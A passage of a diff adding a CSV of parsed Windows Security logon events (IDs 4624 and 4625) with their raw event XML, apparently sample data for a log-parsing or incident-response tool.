+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31fb1a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50437</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:28:32.159991Z"">
+    </TimeCreated>
+    <EventRecordID>768618</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1636"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31daf6</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50436</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:27.714758Z"">
+    </TimeCreated>
+    <EventRecordID>137225</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x1cd964</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x1cd8f6</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:27.714613Z"">
+    </TimeCreated>
+    <EventRecordID>137224</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x1cd8f6</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x1cd964</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:25.377120Z"">
+    </TimeCreated>
+    <EventRecordID>137223</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""712"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x25c</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4625</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8010000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:23.627952Z"">
+    </TimeCreated>
+    <EventRecordID>137222</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""Status"">0xc000006d</Data>
+    <Data Name=""FailureReason"">%%2313</Data>
+    <Data Name=""SubStatus"">0xc000006a</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:25.097874Z"">
+    </TimeCreated>
+    <EventRecordID>2988550</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x568d99</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64229</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:22.920903Z"">
+    </TimeCreated>
+    <EventRecordID>2988547</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4528"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x56874b</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64227</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:22.906195Z"">
+    </TimeCreated>
+    <EventRecordID>2988544</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4524"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x5686d9</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64226</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:20.521162Z"">
+    </TimeCreated>
+    <EventRecordID>2988535</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""2908"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-220106</Data>
+    <Data Name=""TargetUserName"">samir</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x567758</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:20.450493Z"">
+    </TimeCreated>
+    <EventRecordID>2988529</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""2908"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-220106</Data>
+    <Data Name=""TargetUserName"">samir</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x567515</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.25</Data>
+    <Data Name=""IpPort"">50251</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:19.725408Z"">
+    </TimeCreated>
+    <EventRecordID>2988525</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4524"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x56738f</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64223</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
